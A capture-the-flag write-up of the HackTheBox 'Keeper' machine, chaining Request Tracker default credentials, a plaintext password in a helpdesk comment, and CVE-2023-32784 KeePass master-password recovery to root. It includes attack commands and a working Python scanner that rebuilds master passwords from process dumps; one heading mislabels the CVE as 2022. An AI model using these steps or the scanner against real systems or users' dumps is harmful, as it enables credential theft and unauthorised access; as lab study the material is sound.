- OS: Linux
- Domain / vhosts: keeper.htb, tickets.keeper.htb
Summary
Keeper is an Easy Linux box that chains three entirely avoidable information-disclosure failures into root access. The first is a web helpdesk running with default credentials. The second is an administrator storing a user’s initial SSH password in a plaintext comment field inside that same helpdesk. The third is a KeePass crash dump and password database sitting in a user’s home directory, where CVE-2023-32784 memory forensics recovers the database master password from leftovers of the typed password captured in the dump.
The foothold exploits the fact that Request Tracker ships with documented default credentials (root / password) and many deployments never change them. Once authenticated as admin, all user records are visible, including administrative comments intended only for internal use. The comment on lnorgaard’s account recorded her initial SSH password as plain text — a common but dangerous IT practice of using the helpdesk as a temporary credential store.
The privilege escalation is built around CVE-2023-32784, a KeePass 2.x (before 2.54) vulnerability in which the masked master-password text box leaves a leftover string for each typed character in managed memory after the entry dialog is dismissed. A PoC tool (vdohney/keepass-password-dumper) scans a process memory dump for these artifacts and reconstructs all but the first character of the master password. Here the dump produced the candidate pattern ?ødgrød med fløde, the body of a well-known Danish dessert phrase whose first character is trivial to guess. Opening the KDBX with the recovered master password revealed the keeper.htb (Ticketing Server) entry, whose notes field contained an unencrypted PuTTY private key for root. Converting that PPK to OpenSSH format with puttygen and SSHing as root completed the chain.
Recon
nmap -p- --min-rate 5000 -Pn -oA scans/alltcp <TARGET>
nmap -sCV -p 22,80 -Pn -oA scans/services <TARGET>
22/tcp OpenSSH 8.9p1 Ubuntu
80/tcp nginx 1.18.0
The web root redirects to http://tickets.keeper.htb/rt/, so the vhost needs an /etc/hosts entry before the site renders, a common HTB pattern for virtual-host-based services. The redirect path itself gives away the application: Request Tracker, an open-source ticketing system with published default credentials and a well-documented admin interface. Knowing the application name before login makes testing those defaults the obvious first move, and they succeed here. The RT version (4.4.4) is visible in the footer after login; a version string alone does not prove an install is unpatched, but together with untouched default credentials it points to a deployment that was never hardened after installation.
Foothold — RT default credentials
Request Tracker 4.4.4 accepted the default admin login (root / the publicly-documented default password). Once inside the admin panel, all user accounts and their internal notes are readable. Ticket 300000, “Issue with Keepass Client on Windows”, references a KeePass crash dump that was attached and later moved into Lise’s home directory. More critically, the RT user record for lnorgaard contains an administrative comment recording her initial SSH password in plaintext.
SSH as lnorgaard with that initial password succeeds.
User flag
user.txt is in lnorgaard’s home directory, readable immediately upon login:
cat /home/lnorgaard/user.txt
Privilege escalation — KeePass CVE-2022-32784
The user’s home directory contains RT30000.zip, which unpacks to a KeePass process memory dump and a KDBX database:
KeePassDumpFull.dmp
passcodes.kdbx
CVE-2023-32784 is a KeePass vulnerability (2.x before 2.54) in which the masked master-password text box leaves, for every keystroke, a string of bullet characters followed by the typed character in managed heap memory, and those strings survive the dialog closing. A PoC scanner (vdohney/keepass-password-dumper) reads these artifacts and reconstructs all but the first character:
git clone https://github.com/vdohney/keepass-password-dumper
cd keepass-password-dumper
dotnet run ../KeePassDumpFull.dmp
The tool outputs a pattern like ?ødgrød med fløde, with the unrecoverable first character masked; positions where several candidates compete (for example after a typo corrected while typing) are listed in braces. The body of the phrase is a well-known Danish dessert name, so the missing first character is trivially guessable. Open passcodes.kdbx with the recovered master password. The keeper.htb (Ticketing Server) entry contains root’s credentials and, in the notes field, an unencrypted PuTTY-format SSH private key.
Save the PPK content to a file and convert it to OpenSSH format:
puttygen root.ppk -O private-openssh -o id_rsa_root
chmod 600 id_rsa_root
ssh -i id_rsa_root root@<TARGET>
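Before running puttygen it is worth checking two things about a PPK pulled out of a notes field: whether it is actually unencrypted (the Encryption header is none rather than a cipher name, in which case puttygen will prompt for a passphrase) and which key it is. The following is an added example, my own Python and not code from the writeup or from PuTTY: it parses the PPK headers, extracts the public half as an OpenSSH public-key line and computes the SHA256 fingerprint in ssh-keygen -lf format so it can be matched against a target's authorized_keys. The sample key file is constructed inline around a tiny throwaway RSA public blob (not a real key and not the box's key), the Private-Lines and Private-MAC are placeholders, and the MAC is not verified. The header layout is the PPK v2 one; v3 files use the same header lines (plus key-derivation fields when encrypted), so they parse the same way.

```python
import base64
import hashlib
import struct


def ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def ssh_mpint(n):
    """SSH wire-format mpint for a non-negative integer (leading 0x00 if the top bit is set)."""
    return ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def build_sample_ppk(encryption="none"):
    """Constructed PuTTY v2 key file for the example. The public blob is a tiny
    throwaway RSA key (not real, not the box's); the private section and MAC are
    placeholders, only the headers and the public blob are meaningful here."""
    blob = ssh_string(b"ssh-rsa") + ssh_mpint(65537) + ssh_mpint(0xC0FFEE1234567891)
    pub = base64.b64encode(blob).decode()
    pub_lines = [pub[i:i + 64] for i in range(0, len(pub), 64)]   # PPK wraps at 64 chars
    priv_lines = ["QUFBQUFBQUFBQUFBQUFBQQ=="]                      # placeholder
    return "\n".join([
        "PuTTY-User-Key-File-2: ssh-rsa",
        f"Encryption: {encryption}",
        "Comment: rsa-key-constructed",
        f"Public-Lines: {len(pub_lines)}",
        *pub_lines,
        f"Private-Lines: {len(priv_lines)}",
        *priv_lines,
        "Private-MAC: 0000000000000000000000000000000000000000",
    ]) + "\n"


def parse_ppk(text):
    """Parse the header fields and join the base64 Public-/Private-Lines sections."""
    lines = text.splitlines()
    info, i = {}, 0
    while i < len(lines):
        key, _, value = lines[i].partition(": ")
        i += 1
        if key in ("Public-Lines", "Private-Lines"):
            count = int(value)
            info[key] = "".join(lines[i:i + count])
            i += count
        elif key.startswith("PuTTY-User-Key-File-"):
            info["version"] = int(key.rsplit("-", 1)[1])
            info["key_type"] = value
        else:
            info[key] = value
    return info


def needs_passphrase(info):
    """'Encryption: none' converts without a prompt; anything else (e.g. aes256-cbc)
    means the private half is still protected by a passphrase."""
    return info.get("Encryption", "none") != "none"


def openssh_public_line(info):
    """Public-Lines is the SSH wire public-key blob, i.e. exactly the second field
    of an OpenSSH .pub / authorized_keys line."""
    return f"{info['key_type']} {info['Public-Lines']} {info.get('Comment', '')}".rstrip()


def fingerprint(info):
    """SHA256 fingerprint as printed by ssh-keygen -lf (unpadded base64)."""
    blob = base64.b64decode(info["Public-Lines"])
    digest = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return "SHA256:" + digest


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else build_sample_ppk()
    info = parse_ppk(text)
    print(f"PPK v{info['version']} {info['key_type']}, passphrase required: {needs_passphrase(info)}")
    print(openssh_public_line(info))
    print(fingerprint(info))
```

Run it with the path to the saved root.ppk; if needs_passphrase reports True, puttygen will ask for the passphrase and the recovered database entry has not actually handed over the key. Appending the printed public line to a scratch file and running ssh-keygen -lf on it gives the same fingerprint as the function, which is the quickest way to confirm the key matches what a target lists in authorized_keys.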
Why each step worked
Request Tracker’s default credentials persist in production because changing them requires a deliberate post-installation step that many administrators skip when deploying internal tools. The application is functional on first boot with root:password, and if no security review forces the change, it may stay that way indefinitely. Once an attacker has admin access to a helpdesk system, every user record and every ticket is readable — including administrative comments that were never meant to be externally visible.
Storing an initial password in a helpdesk comment is a pattern that emerges from convenience: the administrator needs somewhere to record the credential temporarily before handing it off, and the same system where the user account lives seems like a natural place. The risk is that the helpdesk becomes a credential store with no expiry enforcement and no secret-management controls. A password that was meant to be temporary and immediately changed can persist indefinitely in a comment field.
CVE-2023-32784 comes from how KeePass’s masked master-password text box (SecureTextBoxEx) handled typed input in versions before 2.54. For every character typed, a leftover .NET string is created consisting of one bullet mask character (●, U+25CF) per previously typed character followed by the new character in the clear, so a password typed as abc leaves the strings ●b and ●●c behind. These are ordinary managed strings, not the ProtectedString the password is ultimately kept in, and they are not wiped when the dialog closes. A scanner searches the heap for runs of bullets followed by a character and orders the hits by run length to rebuild the password position by position; the first character is never recoverable because its leftover has no bullet prefix to search for, and corrections typed by the user show up as several candidates for one position. A process dump is a snapshot of that heap, so whatever leftovers existed when the dump was taken are preserved in the .dmp file for as long as it exists.
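As an added example (my own code, not the vdohney tool and not part of the original writeup), here is a minimal scanner for that artifact, covering both the dotnet run step in the privilege-escalation section and the mechanism described in this paragraph. It runs over a constructed byte buffer that mimics the per-keystroke leftovers for a made-up password, including one stray leftover from a corrected typo, and renders the result the way the PoC does: ● for the unrecoverable first character and braces where several candidates compete for a position. Pass the path of a real .dmp as the first argument to scan an actual dump instead.

```python
import re
import sys
from collections import defaultdict

# KeePass is a .NET application, so strings on its heap are UTF-16LE.
# The masked master-password box leaves, for every typed character, a
# leftover string "●●●c": one bullet (U+25CF) per previously typed
# character followed by the new character in the clear.
BULLET = "\u25cf".encode("utf-16-le")          # b"\xcf\x25"

# A maximal run of bullets (the lookbehind stops us matching inside a
# longer run) followed by the two bytes of the next UTF-16 code unit.
LEFTOVER = re.compile(rb"(?<!\xcf\x25)((?:\xcf\x25)+)([\x00-\xff]{2})")


def build_sample_dump(password, typos=()):
    """Constructed stand-in for a KeePass process dump (not a real .dmp).

    Emits the per-keystroke leftovers for `password` plus extra leftovers
    for `typos` as (position, char) pairs, mimicking a typo the user
    corrected, which is why real dumps often show several candidates for
    one position.
    """
    chunks = [b"\x00" * 16]
    # Position 0 leaves only the bare character with no bullet prefix,
    # so it is not searchable; start at 1 like the real artifact.
    for i in range(1, len(password)):
        chunks.append(BULLET * i + password[i].encode("utf-16-le"))
        chunks.append(b"\x00" * 8)            # heap filler
    for pos, ch in typos:
        chunks.append(BULLET * pos + ch.encode("utf-16-le"))
        chunks.append(b"\x00" * 8)
    return b"".join(chunks)


def recover_candidates(dump):
    """Map password position -> set of candidate characters found in dump."""
    candidates = defaultdict(set)
    for m in LEFTOVER.finditer(dump):
        pos = len(m.group(1)) // 2            # number of bullets = position
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:
            continue                          # lone surrogate: heap noise
        if ch.isprintable():
            candidates[pos].add(ch)
    return dict(candidates)


def assemble(candidates):
    """Render like the PoC: '●' for the unrecoverable first character,
    '{a,b}' where several candidates compete, '?' for a missing position."""
    if not candidates:
        return ""
    out = ["\u25cf"]
    for pos in range(1, max(candidates) + 1):
        opts = sorted(candidates.get(pos, ()))
        if len(opts) == 1:
            out.append(opts[0])
        elif opts:
            out.append("{" + ",".join(opts) + "}")
        else:
            out.append("?")
    return "".join(out)


SAMPLE_PASSWORD = "Tr0ubadør&3"               # constructed, not the box's password


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:    # a real KeePass .dmp
            data = f.read()
    else:
        data = build_sample_dump(SAMPLE_PASSWORD, typos=[(10, "4")])
    print(assemble(recover_candidates(data)))
```

On the constructed buffer the output is ●r0ubadør&{3,4}: everything after the first character is recovered and the corrected typo surfaces as two candidates for the last position. The same search is what makes the page's .dmp caveat concrete: the scan needs no symbols, no .NET runtime and no knowledge of KeePass internals, only the raw bytes of the dump.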
Storing an unencrypted private key inside a KeePass entry notes field effectively collapses the security of the key onto the security of the database password. Once the master password is recovered, the key is recovered without any additional factor. This is especially consequential when the key is a root SSH key — it provides immediate privileged access to any host that trusts it.
Counterfactuals
Changing the RT admin password during installation closes the initial entry point completely. No other vulnerability in this chain is reachable until an attacker has admin access to RT, so enforcing a credential change as part of the deployment checklist collapses the entire attack chain at step one.
Eliminating plaintext passwords from helpdesk comments removes the pivot from RT access to SSH access. If initial credentials must be communicated through the helpdesk, they should be generated as one-time tokens with a short expiry — not stored as permanent comment text. A secrets manager or an automated “change password on first login” enforcement would have prevented lnorgaard’s initial password from remaining readable in a comment.
Upgrading KeePass to 2.54 or later removes the artifact: the master-password text box was reworked to read and write its contents through direct Windows API calls and to scatter dummy fragments in memory, so the typed-character leftovers are no longer recoverable from a dump. Separately, treating crash dumps as sensitive artifacts (restricting their storage, encrypting them at rest, and purging them after analysis) limits the window during which a dump is available for offline exploitation.
Storing an unencrypted private key in a password database entry breaks the key’s independence from the database. The private key should carry its own passphrase so that recovering the database is not sufficient alone. Alternatively, using certificate-based SSH with short-lived certificates would render any stored static key irrelevant.
Key Takeaways
- Default credentials on helpdesk and ticketing systems are worth testing before anything else — they expose every user record and internal note if they succeed.
- Helpdesk comment fields are not a safe credential store; any secret placed there should be treated as already disclosed.
- CVE-2023-32784 recovers nearly the entire KeePass master password from a single process dump; treat .dmp files as being as sensitive as the database itself.
- PuTTY PPK keys can be converted to OpenSSH format with puttygen; an unencrypted PPK in a notes field is immediately usable.
References
- vdohney, keepass-password-dumper (PoC for KeePass CVE-2023-32784): https://github.com/vdohney/keepass-password-dumper
- 0xdf, “HTB: Keeper”
- IppSec, “Keeper” video walkthrough